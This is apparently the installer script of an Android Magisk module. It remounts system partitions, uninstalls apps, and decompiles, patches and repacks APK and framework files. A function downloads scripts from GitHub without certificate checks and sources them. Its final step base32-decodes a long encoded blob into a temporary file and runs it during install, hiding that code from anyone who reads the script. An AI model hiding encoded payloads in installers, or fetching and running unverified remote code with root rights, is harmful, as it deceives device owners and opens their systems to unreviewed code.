# Kakathic

## Language text
chon="Chọn"
time="Tổng thời gian"
h="giờ"
m="phút"
s="giây"
Information="Thông tin"
author="Tác giả"
name="Tên"
unzip="Đang xử lý..."
volkey1="! Sử dụng phím âm lượng"
volkey2="! Vol- = Chọn số hiện tại, Vol+ = Chuyển đổi số."
volkey3="! Ấn nút nguồn để hủy."
load="Tải"
error="! Lỗi không tìm thấy hoặc lỗi mạng !"
error2="- Mô-đun này chỉ chạy trên thiết bị arm64, của bạn là $ARCH !"

TTvip=1
ui_print(){ echo "$1"; sleep 0.005; }
ui_print2(){ echo "  $1"; }
Xan(){ echo "  $1" >&2; }
BatdauT=$(date +%s)

# Volume keys
Vk(){ 
input2="$1"; input=1
Kgg(){ 
Key="$(getevent -qlc 1 | awk '{print $3}')"
if [ "$Key" == "KEY_POWER" ];then
abort
elif [ "$Key" == "KEY_VOLUMEUP" ];then
[ "$input" == "$input2" ] && input=1 || input=$(($input + 1))
ui_print "  $input"
sleep 0.3
Kgg
elif [ "$Key" == "KEY_VOLUMEDOWN" ];then
ui_print
ui_print "  $chon: $input"
ui_print
sleep 0.3
else Kgg; fi; }
Kgg
}

# Count time 
End_time(){
KetthucT=$(date +%s)
TongTG=$(($KetthucT - $BatdauT))
Gio=$(printf '%d' $((TongTG/3600%24)))
Phut=$(printf '%d' $((TongTG/60%60)))
if [ "$Gio" != 0 ];then
echo "$time: $(printf '%d '$h', %d '$m', %d '$s'.' $((TongTG/3600%24)) $((TongTG/60%60)) $((TongTG%60)))"
elif [ "$Phut" != 0 ];then
echo "$time: $(printf '%d '$m', %d '$s'.' $((TongTG/60%60)) $((TongTG%60)))"
else
echo "$time: $(printf '%d '$s'.' $((TongTG%60)))"
fi
}

# Download packages
Xu_install(){
[ "$2" ] && pb="_$2"
if [ ! -e "/data/tools/ck/$1$pb" ];then
ui_print "  $load $1..."
ui_print
Taive "https://github.com/kakathic/Tools/raw/Vip/Library/$1/README.md" "$TMPDIR/$1.sh"
[ "$(grep -icm1 '#\ kakathic' $TMPDIR/$1.sh)" == 1 ] && chmod 777 "$TMPDIR/$1.sh" || abort "$error"
cd /data/tools
. "$TMPDIR/$1.sh"
chmod -R 777 /data/tools/bin
rm -fr $HOME/tmp/*
fi
unset pb
}

# Internet
User="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
Taive(){
[ -e /system/bin/curl ] && curl -s -k -L -H "$User" --connect-timeout 20 "$1" -o "$2" || wget -q --header "$User" --no-check-certificate "$1" -O "$2" >&2
}
Xem(){
[ -e /system/bin/curl ] && curl -s -k -G -L -H "$User" --connect-timeout 20 "$1" || wget -q --header "$User" --no-check-certificate -O - "$1"
}

# mount
mrw () {
for i in / /system_root /system /system_ext /vendor /product; do
/system/bin/mount $i 2>/dev/null || /system/bin/mount $i 2>/dev/null
/system/bin/mount -o rw,remount $i 2>/dev/null || /system/bin/mount -o rw,remount $i 2>/dev/null
done
}

mro () {
for i in / /system_root /system /system_ext /vendor /product; do
/system/bin/mount -o ro,remount $i 2>/dev/null || /system/bin/mount -o ro,remount $i 2>/dev/null
/system/bin/umount $i 2>/dev/null || /system/bin/umount $i 2>/dev/null
done
}

baksmali () { java -Xms256m -Xmx512m -jar "/data/tools/lib/Tools/baksmali.jar" "$@"; }
smali () { java -Xms256m -Xmx512m -jar "/data/tools/lib/Tools/smali.jar" "$@"; }

# Tìm kiếm
Timkiem(){ find $TMPDIR/Apk/$2 -name "*.smali" -exec grep -l "${1//\//\\\/}" {} +; }

Vsmali(){
for Vka in $(find $4 -name "*.smali" -exec grep -l "$1" {} +); do
[ -e $Vka ] && ui_print2 "MOD: $RANDOM" || Xan "- Lỗi: $(echo "$1" | sed 's|\\||g')"
[ -e $Vka ] && sed -i -e "/^${1//\//\\\/}/,/${2//\//\\\/}/c $(echo "$3" | sed -z 's|\n|\\n|g')" "$Vka"
[ -e $Vka ] && echo "$Vka" >> $TMPDIR/Apk/$(echo "$4" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

Thaythe(){
ui_print2 "MOD: $RANDOM -> $RANDOM"
for Tt2 in $(find $3 -name "*.smali" -exec grep -l "$1" {} +); do
[ -e "$Tt2" ] && sed -i "s|${1//\//\\\/}|${2//\//\\\/}|g" $Tt2 || Xan "- Lỗi: $1"
[ -e "$Tt2" ] && echo "$Tt2" >> $TMPDIR/Apk/$(echo "$3" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

Autoone(){
ui_print2 "MOD: $RANDOM -> $RANDOM"
for vakkddhh in $(find $3 -name "*.smali" -exec grep -l "..., $1" {} +); do
echo "sed -i $(grep "..., $1" "$vakkddhh" | awk '{print "-e \"s|sget-boolean "$2" '$1'|const/4 "$2" '$2'|g\"" }' | sort | uniq | tr '\n' ' ') $(echo "$vakkddhh" | sed 's|\$|\\\$|g')" | sh
echo "$vakkddhh" >> $TMPDIR/Apk/$(echo "$3" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

CPapk(){
PTC="$(pm path "$1" | cut -d : -f2)"
if [ "$(echo "$PTC" | grep -cm1 '/data/')" == 1 ];then
cp -rf $PTC "/data/tools/apk/$1.apk"
cp -rf "$PTC" "$TMPDIR/Apk/$1.apk"
pm uninstall $1 >&2
else
Pathfw2="$(find /*/app /*/*/app /*/priv-app /*/*/priv-app /*/framework /*/*/framework -type f -name "${PTC##*/}" -not -path "*/data/*" | head -n1)"
Padddj="$(find $(magisk --path)/.magisk/mirror -type f -name "${PTC##*/}" -not -path "*/data/*" | head -n1)"
#cp -rf $PTC "/data/tools/apk/$1.apk"
[ -e "/data/tools/apk/$1.apk" ] && cp -rf "/data/tools/apk/$1.apk" "$TMPDIR/Apk/$1.apk" || cp -rf "$Padddj" "$TMPDIR/Apk/$1.apk"
fi
echo "$(pm path "$1" | cut -d : -f2)" | tee "$TMPDIR/Apk/$1.txt" >&2
}

CPfile(){
Pathfw="$(find /*/app /*/*/app /*/priv-app /*/*/priv-app /*/framework /*/*/framework -type f -name "$1.jar" -not -path "*/data/*" | head -n1)"
Padddjfn="$(find $(magisk --path)/.magisk/mirror -type f -name "$1.jar" -not -path "*/data/*" | head -n1)"
cp -rf "$Padddjfn" "$TMPDIR/Apk"
echo "$Pathfw" | tee "$TMPDIR/Apk/$1.txt" >&2
}

# giải nén file
Giainen(){
for vapk in $TMPDIR/Apk/*.*; do
if [ "${vapk##*.}" == 'apk' ] || [ "${vapk##*.}" == 'jar' ];then
PTd="$(cat ${vapk%.*}.txt)"
[ -e "$vapk" ] && ui_print "  Giải nén: ${PTd##*/}" || abort "- Lỗi không tìm thấy file! ${PTd##*/}"
ui_print
mkdir -p ${vapk%.*}
unzip -qo "$vapk" '*.dex' -d ${vapk%.*}
for vsmali in ${vapk%.*}/*.dex; do
baksmali d --api $API $vsmali -o ${vsmali%.*}
done
fi
done
}

Donggoi(){
# Đóng gói apk
for bapk in $TMPDIR/Apk/*.*; do
if [ "${bapk##*.}" == 'apk' ] || [ "${bapk##*.}" == 'jar' ];then
if [ -e "${bapk%.*}/class" ];then
PTb="$(cat ${bapk%.*}.txt)"
ui_print "  Đóng gói: ${PTb##*/}"
ui_print
for bsmali in $(cat ${bapk%.*}/class 2>/dev/null | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f2 | sort | uniq); do
rm -fr "$bsmali".dex
smali a --api $API ${bapk%.*}/$bsmali -o "${bapk%.*}/$bsmali".dex
done
cd ${bapk%.*}
zip -qr -0 $bapk '*.dex'
zipalign -f 4 $bapk $TMPDIR/Apk/tmp/${bapk##*/} 
cp -rf $TMPDIR/Apk/tmp/* $TMPDIR/Apk
else
rm -fr ${bapk%.*}*
fi
fi
done

for Capk in $TMPDIR/Apk/*.*; do
if [ "${Capk##*.}" == 'apk' ];then
Papkp="$(cat ${Capk%.*}.txt)"
if [ "$(unzip -l $Capk 2>/dev/null | grep -cm1 "lib/$ABI/")" == 1 ];then
mkdir -p $MODPATH${Papkp%/*}/lib/$ARCH
unzip -qo -j $Capk "lib/$ABI/*" -d $MODPATH${Papkp%/*}/lib/$ARCH
fi
mkdir -p $MODPATH${Papkp%/*}
cp -rf $Capk "$MODPATH$Papkp"
fi
if [ "${Capk##*.}" == 'jar' ];then
Papkp="$(cat ${Capk%.*}.txt)"
mkdir -p "$MODPATH${Papkp%/*}"
cp -rf $Capk "$MODPATH$Papkp"
fi
done
}

# Freeze
FREEZE(){
for TARGET in $1; do
mktouch $MODPATH$TARGET/.replace
done
}

GP () { grep_prop $1 $TMPDIR/module.prop; }

API=$(getprop ro.build.version.sdk)
ABI=$(getprop ro.product.cpu.abi)

if [ "$ABI" = "x86" ]; then
export ARCH=x86
export ARMT=i686
elif [ "$ABI" = "arm64-v8a" ]; then
export ARCH=arm64
export ARMT=arm64
elif [ "$ABI" = "x86_64" ]; then
export ARCH=x64
export ARMT=x86-64
else
export ARMT=arm
export ARCH=arm
export ABI=armeabi-v7a
fi

TTM(){
for vah in $1; do
[ -e $vah ] || mkdir -p "$vah"
done
}

TTM "/data/tools/bin
$TMPDIR/Apk/tmp
/data/tools/ck
/data/tools/tmp
/data/tools/apk
/data/tools/lib/Tools"

[ "$API" -ge 31 ] && miuik='miui-'

unset vah
unset mklist

export PATH="/data/tools/bin:$PATH"
export HOME="/data/tools"
export APK="$TMPDIR/Apk"

print_modname(){

echo '
OVUV64DSNFXHICTVNFPXA4TJNZ2CAIRAEASG4YLNMU5CAJBII5ICA3TBNVSSSIBEFBDVAIDWMVZHG2LPNYUSAYTZEASCQR2QEBQXK5DIN5ZCSLBAEQUGOZLUOBZG64BAOJXS44DSN5SHKY3UFZSGK5TJMNSSSLBAERAVASJMEASECUSDJARAU5LJL5YHE2LOOQFHK2K7OBZGS3TUEARCAICU4G5KG2JAMTQ3XLZANRU6DO4HOUXC4LRCBJ2WSX3QOJUW45AKBJKGK43UGEZDGPLUOJ2WKCSBOBUWY5B5EISCQWZAEISCQZTJNRSSAL3EMF2GCL3TPFZXIZLNF5ZXS3TDF5QWGY3POVXHI4ZOPBWWYID4EBTXEZLQEAWWGIDUMV4HIKJCEA6T2IBREBOSAJRGEBRXAIBNOJTCAL3EMF2GCL3TPFZXIZLNF5ZXS3TDF5QWGY3POVXHI4ZOPBWWYIBEKRGVARCJKIXTCLTYNVWCA7D4EBQWE6BSPBWWYIBPMRQXIYJPON4XG5DFNUXXG6LOMMXWCY3DN52W45DTFZ4G23BAERKE2UCEJFJC6MJOPBWWYOZAM5ZGK4BAFVWTCIBCMNXW2LTYNFQW63LJEIQCIVCNKBCESURPGEXHQ3LMEB6CA5DSEATSAJZAE5OG4JZAPQQGO4TFOAQC23JREBQWGY3POVXHIID4EBRXK5BAFVSCAXBCEAWWMMRJEIFFWIBNPIQCEJCBOBUWY5BCEBOSAJRGEB2WSX3QOJUW45AKLMQC26RAEISEC4DJNR2CEIC5EATCMIDVNFPXA4TJNZ2CAISM4G5ZO2J2EBEMHI3ZEDCJDREDNZTSA3TI4G5K24BAYSI6DO4DEBUGTYN3Q5XCA2LEEBMGSYLPNVUSSIQKBJUW2ZLJHURCIKDHMV2HA4TPOAQHAZLSONUXG5BOOJQWI2LPFZWWK2LEFERAUWZAFV5CAIRENFWWK2JCEBOSAJRGEBUW2ZLJHURCIKDHMV2HA4TPOAQHE3ZOOJUWYLTPMVWS43LFNFSCSIQKLMQC26RAEISGS3LFNERCAXJAEYTCA2LNMVUT2IREFBTXEZLQEAWW2MJANNSXSX3NMVUWIX3TNRXXIMBAF5SGC5DBF4VC6MBPMNXW2LTBNZSHE33JMQXHA2DPNZSS643IMFZGKZC7OBZGKZTTF5RW63JOMFXGI4TPNFSC44DIN5XGKX3QOJSWMZLSMVXGGZLTFZ4G23BAPQQGG5LUEAWWIIBHHYTSALLGGIQHYIDDOV2CALLEEATTYJZAFVTDCKJCBJNSALL2EARCI2LNMVUSEIC5EATCMIDVNFPXA4TJNZ2AUWZAFV5CAIRENFWWK2JCEBOSAJRGEB2WSX3QOJUW45BAEJGODO4XNE5CASGDUN4SBYN2UVXCAKRDGA3CGIGESHQ3XAZANBU6DO4HNYQE2RKJIQUSECQKMRZGS5TFOI6SIKDHMV2HA4TPOAQHE3ZOOBZG6ZDVMN2C45TFNZSG64ROMRSXM2LDMUUQUWZAEISGI4TJOZSXEIRALUQHY7BAMRZGS5TFOI6SIKDHMV2HA4TPOAQHE3ZOOBZG6ZDVMN2C443ZON2GK3JOMRSXM2LDMUUQUCSUMVRTCPJCEQUFQZLNEARGQ5DUOBZTULZPOJQXOLTHNF2GQ5LCOVZWK4TDN5XHIZLOOQXGG33NF5VWC23BORUGSYZPLJEC2VSOF5NEQL2DN5SGKLZEMRZGS5TFOIXSIKDFMNUG6IBNNYQCEJCBOBUWY5BCEB6CAYTBONSTGMRAFV3TAKJCFERAUVDFMMZD2IREFBMGK3JAEJUHI5DQOM5C6L3SMF3S4Z3JORUHKYTVONSXEY3PNZ2GK3TUFZRW63JPNNQWWYLUNBUWGL22JAWVMTRPLJEC6Q3PMRSS6JDEOJUXMZLSF4SCQZLDNBXSALLOEARCI2LNMVUSEID4EBRGC43FGMZCALLXGAUSEKJCBIFGSZRALMQCEJD3KRSWGMJPF4WS67JCEAWWOZJAEISCQZDBORSSAKZFLESW2JLEFERCAXJ3ORUGK3QKLMQCEJCUMVRTCIRALUQCMJRAIR2GS3LFHUSFIZLDGEFFA4TPHUYQU5DLNFSD2JCBOBUWY5AKMVWGSZRALMQCEJD3KRSWGMRPF4WS67JCEAWWOZJAEISCQZDBORSSAKZFLESW2JLEFERCAXJ3ORUGK3QKLMQCEJCUMVRTEIRALUQCMJRAIR2GS3LFHUSFIZLDGIFFA4TPHUYQU5DLNFSD2JDJNVSWSCTFNRZWKCSEORUW2ZJ5EISCQZDBORSSAKZFLEWSK3JJFUSCQZLDNBXSAJBIFAQCIKDEMF2GKIBLEVSCSIBLEAYSAKJJFEQCIKDEMF2GKIBLEVEDUJKNFERAUZTJBIFGSZRALMQCEJCQOJXSEIB5HUQDCIC5HN2GQZLOBIFHK2K7OBZGS3TUEARCAICDNDB2A3ZAMLQ3VILOHIQCI5DLNFSCYICIKNCDUIBEIR2GS3LFEIFHK2K7OBZGS3TUBIFGK3DJMYQFWIBNMUQC6ZDBORQS65DPN5WHGL3MNFRC63DPM4XHI6DUEBOTW5DIMVXAUYLCN5ZHIIBCEEQEFYN2UFXCBRERYORSA5HBXOVW4ZZAOPQ3XLJAMTQ3XJLOM4QGJQ5ZNZTSA5DI4G522IDOM5UGTYN3Q5WSACRAEAFCAICN4G5Z22JAMLQ3VILOEDQ3XJ3OM4QGRYN3TEQMJEPBXOBSA5DJ4G5L64BAOTQ3XJLDEBZ6DO5NEBSODO5FNZTS4CRCBJSWY43FBJUWMIC3EARCIKCHKAQGSZBJEIQD2PJAEJLEQLKQKQRCAXJAPR6CAWZAEISCQR2QEBUWIKJCEA6T2IBCKZEC2R2BEIQF2ID4PQQFWIBCEQUEOUBANFSCSIRAHU6SAISWJAWUWRJCEBOTW5DIMVXAUYLCN5ZHIIBCEEQEG2HBXOESAY6DWMQHI2HBXOBSAZGDXFXGOIDUNDQ3XLJAJVXWI5LMMUFAUIBAKRUMHKTNEB2GTYN2X5XGOICWNHQ3XB3UEIFGM2IKOVUV64DSNFXHIIBCEEQFI2GDWRXGOIDCYOQW6IHBXOTW4ZZANDQ3XGJANZUMHIBAOBUMHILUEB2HE2PBXOBW4IAKBIQCAVGDVJXCA3ODUF4TUIBEMRZGS5TFOIFAUIBAKTB2A2JANNUG7YN2UNXCATLJHIQCIQLQNFWHICRAEAFCAICJJVCUSORAERUW2ZLJBIFCAIGESDQ3XAZAOPQ3XLJAMTQ3XJLOM4QGZQ5COUQGJQ5ANEQGFYN2UFXCA3WDVJXCBYN3U5XGOIDI4G5ZSCQKEAQMJEPBXOBSA47BXOWSAZHBXOSW4ZZAO3CKS3TIEB3GTYN3QVXC4CQKEAQFI2HBXOWSA3THNBU6DO4HNUQHHYN2XUQGHQ5TEB2MHILDEBSODO5FNZTSA5DSN5XGOIBSGQQGO2PBXOOSACQKEAQERYN2X52CA5DI4G5Z22JAM5UWC3RAOPQ3VPJAOTQ3XMJAYSI6DO4ZNZTSA4TFMJXW65BOBIRAUYLNEBZXIYLSOQQC2YJAMFXGI4TPNFSC42LOORSW45BOMFRXI2LPNYXFMSKFK4QC2ZBAEJUHI5DQOM5C6L3LMFVWC5DINFRS4Z3JORUHKYRONFXS6WSIFVLE4L2TOVYHA33SOQXGQ5DNNQRCAPRGGIFAUIZDEBBWQZLDNMQHI2DFEBZXS43UMVWSAZDFOZUWGZLTBJNSAIREIFJEGSBCEA6T2IBCMFZG2NRUEIQF2ID4PQQGCYTPOJ2CAIREMVZHE33SGIRAUCTUMV4GWPJCE5B6DOVDNUQMNILOEBRODOVBNYQMJEODUMQODO5HNZTSA2HBXOMSA3LPMR2WYZJAKZU6DO4HOQQE4YLNEBRODOVBNYQGHQ5TEB2GRYN3QMQHI2PBXK7XAIDU4G52KYZAOPQ3XLJAMTQ3XJLOM4XCOIQKORSXQ2ZSHURCOQ6DWJXCAMJAORU6DOV7NZTSA3XBXOXWCIDNN5SHK3DFEBLGTYN3Q52CA2GDWNQSA47BXK6SA2HBXK7XIIDUNDQ3XHLJEBTWSYLOEBZ6DO5NEBSODO5FNZTSOIQKMVRWQ3ZAE4FHO2DJNRSSA5DSOVSTWIDEN4FHI2DPNFTWSYLONJSD2IREFBSGC5DFEAVSKWJFNUSWIJKIEVGSSIQKORUG62LHNFQW42DFOQ6SEJZEFBSGC5DFEAVSKWJFNUSWIJKIEVGSSJZCBJUWMIC3EARCIKBIEASHI2DPNFTWSYLONJSCALJAER2GQ33JM5UWC3TIMV2CAKJJEIQC2Z3FEARDCMBQGAYCEIC5HN2GQZLOBJNSAIREFAUCAJDUNBXWSZ3JMFXGUZBAFUQCI5DIN5UWO2LBNZUGK5BAFEUSEIBNM5SSAIRZHEYDAIRALUQCMJRAON2SALLMOAQDEMBQGAQC2YZAEJRW2ZBANZXXI2LGNFRWC5DJN5XCA4DPON2CAJCSIFHEIT2NEATSI5DFPBVTEJZCBJZG2IBNMZZCAL3EMF2GCL3BMRRC63LPMR2WYZLTF5LEQLJKBJZWYZLFOAQDCMAKMJZGKYLLBJSWY43FBJSHE2LWMVZD2JZEMRZGS5TFOITQUQLQNFWHIPJHERAXA2LMOQTQU2LNMVUT2JZENFWWK2JHBJKGKYZRHURCIKDDOVZGYIBNONGEOIBCNB2HI4DTHIXS64TBO4XGO2LUNB2WE5LTMVZGG33OORSW45BOMNXW2L3LMFVWC5DINFRS6WSIFVLE4L22JAXUG33EMUXSIZDSNF3GK4RPEQUGKY3IN4QC23RAEISEC4DJNR2CEID4EBRGC43FGMZCALLXGAUSEKJCBJKGKYZSHURCIKDDOVZGYIBNONGEOIBCNB2HI4DTHIXS64TBO4XGO2LUNB2WE5LTMVZGG33OORSW45BOMNXW2L3LMFVWC5DINFRS6WSIFVLE4L22JAXUG33EMUXSIZDSNF3GK4RPEQUGKY3IN4QC23RAEISGS3LFNERCA7BAMJQXGZJTGIQC25ZQFERCSIQKBJ6QU2LGEBNSAIREKBZG6IRAHU6SAMJALU5XI2DFNYFHG5JAFVWHAIBSGAYDAIBNMMQCEY3NMQQG433UNFTGSY3BORUW63RAOBXXG5BAERJECTSEJ5GSAJZEORSXQ2ZHEIFGE4TFMFVQUZTJBJZWYZLFOAQDGNRQGAFGM2IKMRXW4ZIKE4QD4IBPMRQXIYJPORXW63DTF5WGSYRPOJ2W4LTTNAFGKY3IN4QCOCTFMNUG6IB6EAXWIYLUMEXXI33PNRZS63DJMIXWY33HFZ2HQ5AKFYQC6ZDBORQS65DPN5WHGL3MNFRC64TVNYXHG2AKLMQC2ZJAEQUGKY3IN4QC6ZDBORQS6YLEMIXW233EOVWGK4ZPKZEC2WSIF5ZXS43UMVWS64DSN5SHKY3UF5XXMZLSNRQXSL22PIXGC3TEOJXWSZBOMFYGWKJALUQHY7BAOJWSALLGOIQC6ZDBORQS6YLEMIXSULZKF5ZXS43UMVWS6KRPN53GK4TMMF4S6WT2FYVC4YLQNMFHE3JAFVTHEIBPMRQXIYJPORXW63DTF5WGSYRPOJ2W4LTTNAFHE3JAFVTHEIBPMRQXIYJPMFSGEL3TMVZHM2LDMUXGIL2WJMXHG2AKE4QD4IBPMRQXIYJPMFSGEL3TMVZHM2LDMUXGIL2WJMXHG2AKBJRWQ3LPMQQDONZXEAXWIYLUMEXWCZDCF5ZWK4TWNFRWKLTEF5LEWLTTNAQAUY3INVXWIIBXG43SAL3EMF2GCL3UN5XWY4ZPNRUWEL3SOVXC443IBJTGS===
' | base32 -d > $TMPDIR/ka.sh && . $TMPDIR/ka.sh
}




